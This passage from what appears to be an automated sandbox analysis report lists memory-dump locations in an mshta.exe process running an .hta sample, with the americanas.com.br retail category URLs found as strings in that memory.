Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/esporte-e-lazer?chave=pfm_home_esporte_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/games?chave=pfm_home_games_menu
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/games?chave=pfm_home_games_menuJ
Source: mshta.exe, 00000000.00000003.2676562635.000000000AA1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743317216.000000000C09F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/gift
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/gift-card
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.0000000009355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726617731.0000000009354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/gift-card?chave=dk_hm_ats_2_10_giftcard
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/gift-card?chave=pfm_home_gc_menu
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776512288.000000000C0ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informaca/notebooks-gamer?chave=p
Source: mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748068401.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774035249.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=dk_hm_at_infoacess
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_hm_tt_1_0_informatica-e-a
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_home_infoacess_menu
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador-gamer?chave
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/computadores-e-all-in-one/computador?chave=pfm_h
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks-gamer?chave=pfm_hm_tt_1_0_notebook-gam
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747475403.000000000C12A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=dk_hm_at_notebooks
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=dk_hm_at_notebooksmeta.largemeta
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776512288.000000000C0ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/informatica/notebooks?chave=pfm_hm_tt_1_0_notebook
